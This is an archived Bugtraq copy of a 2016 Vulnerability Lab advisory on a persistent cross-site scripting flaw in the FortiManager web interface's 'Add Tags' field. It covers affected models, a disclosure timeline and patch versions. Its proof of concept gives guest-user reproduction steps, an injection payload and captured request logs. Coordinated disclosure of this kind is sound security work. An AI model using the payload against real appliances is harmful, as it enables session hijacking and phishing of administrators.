[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
FortiManager (Series) - Multiple Web Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx
- Subject: FortiManager (Series) - Multiple Web Vulnerabilities
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Tue, 2 Aug 2016 10:56:22 +0200
Document Title:
===============
FortiManager (Series) - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1684
Fortinet PSIRT ID: 1624459
Release Notes 1:
http://docs.fortinet.com/uploaded/files/2910/fortimanager-v5.4.0-release-notes.pdf
Release Notes 2:
http://docs.fortinet.com/uploaded/files/2963/fortimanager-v5.2.6-release-notes.pdf
Release Notes 3:
http://docs.fortinet.com/uploaded/files/2456/fortimanager-v5.0.11-release-notes.pdf
Release Date:
=============
2016-08-02
Vulnerability Laboratory ID (VL-ID):
====================================
1684
Common Vulnerability Scoring System:
====================================
3.8
Product & Service Introduction:
===============================
FortiManager appliances allow you to centrally manage any number of Fortinet
devices, from several to thousands, including FortiGate®, FortiWiFi™,
FortiCarrier™, FortiMail™ and FortiAnalyzer™ appliances and virtual appliances,
as well as FortiClient™ endpoint security agents. You can further
simplify control and management of large deployments by grouping devices and
agents into administrative domains (ADOMs).
The FortiManager family of management appliances provides centralized
policy-based provisioning, device configuration, and update management for
FortiGate, FortiWiFi, and FortiMail appliances, and FortiClient end-point
security agents, plus end-to-end network monitoring and device control.
FortiManager delivers a lower TCO for Fortinet implementations by minimizing
both initial deployment costs and ongoing operating expenses. Control
administrative access and simplify policy deployment using role-based
administration to define user privileges for specific management domains and
functions, and aggregating collections of Fortinet appliances and agents into
independent management domains. In addition, by locally hosting security
content updates for managed devices and agents, FortiManager appliances
minimize Web filtering rating request response time and maximize network
protection.
(Copy of the Vendor Homepage:
http://www.avfirewalls.com/FortiManager-Series.asp )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a persistent and
non-persistent web validation vulnerability in
the official Fotinet FortiManager appliance product series. The issue affects
the web-application of the appliance series and is
present in the following fortimanager models - 200D, 300D, 1000D, 3900E,
4000E, Virtual Appliances Version and FortiMoM-VM.
The Fortimanager legacy models 100, 100C, 400A, 400B, 400C, 1000C, 3000C and
4000D are affected as well by the vulnerability.
Vulnerability Disclosure Timeline:
==================================
2016-01-25: Researcher Notification & Coordination (Benjamin Kunz Mejri -
Evolution Security GmbH)
2016-01-26: Vendor Notification (FortiGuard Security Team)
2016-02-08: Vendor Response/Feedback (FortiGuard Security Team)
2016-05-17: Vendor Fix/Patch #1 (Fortinet Service Developer Team)
2016-07-28: Vendor Fix/Patch #2 (Fortinet Service Developer Team)
2016-08-02: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Fortinet
Product: FortiManager - Appliance (Web-Application) 200D, 300D, 1000D, 3900E,
4000E, Virtual Appliances Versio
Fortinet
Product: FortiManager - Appliance (Web-Application) Legacy - 100, 100C, 400A,
400B, 400C, 1000C, 3000C & 4000
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent and non-persistent input validation web vulnerability has been
discovered in the official Fotinet FortiManager appliance product series.
The vulnerability allows privileged guest user accounts and restricted user
accounts to inject own malicious script codes on the application-side or
client-side of the fortimanager appliance web-application series.
The vulnerability is located in the `add Tags` input field of the `Firewall
Objects - Address - Tags` module. The request method to inject is POST to
GET and the attack vector is located on the application-side of the appliance
web-application. Remote attackers are able to inject own malicious script
codes to the add tag input field. After processing to add, the code bypasses
the regular web filter of the appliance web-application and executes finally
in the applied tags module above of the basic input. The vulnerability can be
exploited by guest appliance user accounts with restricted access. The
vulnerability first executes with client-side attack vector and becomes
persistent with the save procedure by return.
The security risk of the application-side and client-side web vulnerability is
estimated as medium with a cvss (common vulnerability scoring system) count of
3.8.
Exploitation of the application-side web vulnerability requires a low
privileged guest web-application user account and low user interaction.
Successful exploitation
of the vulnerability results in persistent phishing, session hijacking,
persistent external redirect to malicious sources and application-side
manipulation of affected
or connected web module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Firewall Objects - Address - Tags -
[Add Tags]
Vulnerable Parameter(s):
[+] appliedTags - tagList
(tagSelector-addTag create-new)
Affected Module(s):
[+] Applied Tags
Affected Serie(s): FortiManager
[+] FortiManager 200D
[+] FortiManager 300D
[+] FortiManager 1000D
[+] FortiManager 3900E
[+] FortiManager-4000E
[+] FortiManager Virtual Appliances
[+] FortiMoM-VM
FortiManager Legacy Models
[+] FortiManager 100
[+] FortiManager 100C
[+] FortiManager 400A
[+] FortiManager 400B
[+] FortiManager 400C
[+] FortiManager 1000C
[+] FortiManager 3000C
[+] FortiManager 4000D
Proof of Concept (PoC):
=======================
The persistent and non-persistent cross site scripting web vulnerability can be
exploited by remote attackers with low privileged web-application user account
and low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability as guest user with restricted
access privileges ...
1. Login to the fortimanager appliance web-application as guest user
2. Open the following section that is not restricted to guests mainly (Firewall
Objects > Address )
3. Now, switch to the Tags section and click to the non-restricted button [Add
Tags]
4. Add in the `Add Tags` and inject to the input field your test payload to
approve the validation
Note: (Payload) "><"<img src="x">%20%20>"<iframe src=a>%20<iframe>
5. The script code execution occrs in the applied tags listing.
6. Successful reproduce of the vulnerability!
PoC: Firewall Objects > Address > Tags > [Add Tags]
<tr><td colspan="99"><b>Tags</b></td></tr>
<tr class="tr_tag"><td class="dep_opt"><label for="appliedTags">Applied
tags</label></td>
<td colspan="99"><span id="appliedTags" class="tag_list"><span mkey=""><"
<img src="x">%20%20>"<iframe src=a>%20<iframe> "><"<img sr" class="object_tag
object_tag_remove">
<span class="tag_label">"><"<img src="x">%20%20>"<[PERSISTENT SCRIPT CODE
EXECUTION!]> "><"<img sr</iframe></span><span
class="tag_tail"></span></span></span></td></tr>
<tr class="tr_tag"><td class="dep_opt"><label for="addTag">Add tags</label></td>
<td colspan="99" style="vertical-align:top;padding-bottom:30px;">
<div class="yui-ac" style="width:20em;"><input class="yui-ac-input" id="addTag"
name="addTag" maxlength="63" autocomplete="off" type="text"><span
style="display:
inline-block; position: absolute; left: 22em;" class="icon13 tagSelector-addTag
create-new"></span><div class="yui-ac-container" id="tag_ac_list"><div
style="display:
none;" class="yui-ac-content"><div style="display: none;"
class="yui-ac-hd"></div><div class="yui-ac-bd"></div><div style="display:
none;" class="yui-ac-ft"></div></div></div></div>
</td></tr>
<input value=""><"<img src="x">%20%20>"<[PERSISTENT SCRIPT CODE
EXECUTION!]>%20<iframe> "><"<img sr" id="tagList" name="tagList" type="hidden">
<tr id="_clionly_opts_"><td style="text-align:left;" colspan="99"><nobr><a
href="#" onclick="taggleCLIOnlyFields();"><img id="cli:twist:img"
src="/resource/images/twistie_collapsed.gif">Advanced
Options</a></nobr></td></tr><tr id="cli:tb:row" style="display:none"><td
colspan="99">
<table id="_comp_15" name="_comp_15" class="list" align="center"
cellpadding="0" cellspacing="1">
<tbody><tr
class="heading"><td>Name</td><td>Description</td><td>Value</td></tr><tr>
<td style="text-align:left" nowrap="">cache-ttl</td>
<td style="text-align:left" nowrap="">Minimal TTL of individual IP addresses in
FQDN cache.</td>
<td style="text-align:left"><input id="cache-ttl" name="cache-ttl" value="0"
maxlength="86400" type="text"></td>
</tr>
<tr tip="visibility:Enable/disable address visibility.<br>enable: Show in
address4 selection.<br>disable: Hide from address4 selection.<br>">
<td style="text-align:left" nowrap="">visibility</td>
<td style="text-align:left" nowrap="">Enable/disable address visibility.</td>
<td style="text-align:left"><select id="visibility" name="visibility"><option
value="1" selected="">enable</option><option
value="0">disable</option></select></td>
</tr>
</tbody></table>
<input name="sortDirection" value="0" type="hidden">
<input name="sortFieldName" value="" type="hidden">
</td></tr></tbody></table></td></tr>
<tr id="footer_content"><td align="center">
<table class="footer" cellpadding="0" cellspacing="0">
<tbody><tr><td>
<input id="_returnbtn_" class="button" value="Return" onclick="
if (window.opener) {window.close();} else
{dlg_returnPage('SOMAddressObj?devGrpId=18446744073709551615&deviceId=18446744073709551615&vdom=root&adomId=3');}"
type="button"></td></tr>
</tbody></table>
</td></tr>
</tbody>
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET
http://fortimanager.localhost:8080/cgi-bin/module//sharedobjmanager/firewall/x[PERSISTENT
SCRIPT CODE EXECUTION!]
Mime Type[text/html]
Request Header:
Host[fortimanager.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101
Firefox/43.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://fortimanager.localhost:8080/cgi-bin/module//sharedobjmanager/firewall/SOMAddressObjDialog?devGrpId=18446744073709551615&deviceId=18446744073709551615&vdom=root&adomId=3&vdomID=0&adomType=gms&cate=140&prodId=0&key=all&catetype=140&cate=140&permit_w=1&mapped=0&roid=138]
Cookie[remoteauth=1; forRevert=0; vmConfirm=1; tabPosition=; showSlave=1;
add_dev_later=; auth_state=;
CURRENT_SESSION=9X3lvcNst3VYkYtkLWMkgMagWkS+Qmdk38eDLl1jE+ZNJ7Dw/
9EQlVtauZ98+4+nN5aOe5ixbZGoE/sIrlNbRQ==; MCP_VIEW_MODE=sectview;
csrftoken=ea5a7a467e8cabdfe640cd475183d2a5]
Connection[keep-alive]
Response Header:
Date[Tue, 26 Jan 2016 12:04:43 GMT]
Server[Apache]
X-Frame-Options[SAMEORIGIN]
Vary[Accept-Encoding]
Content-Encoding[gzip]
x-ua-compatible[IE=Edge]
Content-Length[460]
Connection[close]
Content-Type[text/html]
-
Status: 200[OK]
GET
http://fortimanager.localhost:8080/cgi-bin/module//sharedobjmanager/firewall/a[PERSISTENT
SCRIPT CODE EXECUTION!]
Mime Type[text/html]
Request Header:
Host[fortimanager.localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101
Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://fortimanager.localhost:8080/cgi-bin/module//sharedobjmanager/firewall/SOMAddressObjDialog?devGrpId=18446744073709551615&deviceId=18446744073709551615&vdom=root&adomId=3&vdomID=0&adomType=gms&cate=140&prodId=0&key=all&catetype=140&cate=140&permit_w=1&mapped=0&roid=138]
Cookie[remoteauth=1; forRevert=0; vmConfirm=1; tabPosition=; showSlave=1;
add_dev_later=; auth_state=;
CURRENT_SESSION=9X3lvcNst3VYkYtkLWMkgMagWkS+Qmdk38eDLl1jE+ZNJ7Dw/
9EQlVtauZ98+4+nN5aOe5ixbZGoE/sIrlNbRQ==; MCP_VIEW_MODE=sectview;
csrftoken=ea5a7a467e8cabdfe640cd475183d2a5]
Connection[keep-alive]
Response Header:
Date[Tue, 26 Jan 2016 12:04:43 GMT]
Server[Apache]
X-Frame-Options[SAMEORIGIN]
Vary[Accept-Encoding]
Content-Encoding[gzip]
x-ua-compatible[IE=Edge]
Content-Length[460]
Connection[close]
Content-Type[text/html]
Reference(s):
http://fortimanager.localhost:8080/
http://fortimanager.localhost:8080/cgi-bin/
http://fortimanager.localhost:8080/cgi-bin/module/
http://fortimanager.localhost:8080/cgi-bin/module/sharedobjmanager/
http://fortimanager.localhost:8080/cgi-bin/module/sharedobjmanager/firewall/
http://fortimanager.localhost:8080/cgi-bin/module/sharedobjmanager/firewall/SOMAddressObj
Solution - Fix & Patch:
=======================
5.4.0
5.2.6
5.0.12 (TBD)
5.0.12(FMG)
5.0.13(FAZ)
Security Risk:
==============
The security risk of the persistent and non-persistent cross site scripting web
vulnerability is estimated as medium. (CVSS 3.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen
material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx -
research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section: magazine.vulnerability-db.com -
vulnerability-lab.com/contact.php -
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All
other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To
record, list (feed), modify, use or edit our material contact
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a
permission.
Copyright © 2016 | Vulnerability Laboratory -
[Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com